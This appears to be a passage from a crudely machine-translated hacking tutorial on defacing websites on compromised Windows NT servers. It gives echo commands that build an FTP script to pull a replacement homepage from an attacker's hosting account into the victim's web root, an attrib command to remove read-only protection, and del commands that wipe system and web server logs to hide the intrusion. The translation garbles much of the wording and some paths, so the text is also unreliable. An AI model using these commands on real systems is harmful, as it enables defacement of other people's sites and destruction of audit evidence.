Maybe you will ask, so simple black, in fact, he can be used to download the homepage to the other party's directory.
1. First, we need to apply for a free home page.
2. Use the ECHO to establish the TXT files below the writable directory: (as the chinren server as an example.)
Open upload.chinaren.com (your space provides you with your space for you when you apply)
CNHACK (username when you apply)
TEST (password when you apply)
Get index.htm c: /inetpub/wwwroot/index.htm (here is the C: /inetpub/wwroot/index.htm of the other party on your space)
Bye (withde the FTP conversation, quite DOS under 98, exit DOS with EXIT)
Specific practice:
Enter echo open upload.chinaren.com> C: /CNHACK.TXT
Enter echo cnhack >> C: /CNHACK.TXT
Enter Echo 39Abs >> C: /CNHACK.TXT
Enter echo get index.htm c: /inetpub/wwroot/index.htm >> C: /CNHACK.TXT
Finally, enter ftp -s: c: /cnhack.txt (using the -s parameter of FTP, the content in the execution file.)
When the command is completed, the file has been downloaded to the file you specified.
Note: After obtaining the file, please delete CNHACK.TXT. (If you don't delete it, it is easy to see your password to others.)
Remember to del C: /cnhack.txt
11: Attrib
This command is to set the file properties. If you want to black a station, and his file's file attribute sets only read, it is very pitiful, you can't do it, you can't do it. inverted! However, this order is not afraid.
Attrib -r index.htm
This command is removed from the read-only attribute of index.htm.
If "-" is changed to " ", the property of this file is set to read-only.
----------------------
Attrib R index.htm
This command is set to read only the property of index.htm.
12el
When you see this title, don't fall! Now I have to leave 127.0.0.1, I want to delete the log, of course, I want to delete the log! Want to be caught. Ha ha.
NT log has these
Del C: / Winnt / System32 / logfiles /*.-
Del C: / WinNT / SSYTEM32 / Config / *. EVT
DEL C: / Winnt / System32 / DTCLOG / *.
Del C: / WinNT / System32 / *. log
DEL C: / WinNT / System32 / *. TXT
Del C: / WinNT / *. TXT
Del C: / WinNT / *. log
As long as you delete these. Some system NT is installed in a D disk or other disc, and C is changed to other disks.